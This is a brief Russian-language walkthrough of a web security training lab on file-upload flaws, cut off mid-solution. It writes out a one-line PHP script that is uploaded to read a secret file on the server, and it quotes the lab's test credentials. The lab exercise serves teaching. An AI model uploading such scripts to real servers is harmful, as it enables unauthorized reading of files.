Эта лаба содержит узявимость в загрузке файлов.
Для решения лабы нужно загрузить PHP скрипт, который выведет содержимое файла /home/carlos/secret. У нас есть креды пользователя wiener:peter.
https://0a580059035e264780154ef8009b001b.web-security-academy.net/ca
Solution
В задаче написано, что нужно загрузить PHP скрипт. Я человек простой, вижу — делаю. Создам файл:
img.php:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Заходим в лк и загружаем файл.
Файл загружен:
Попробую посмотреть его содержимое:
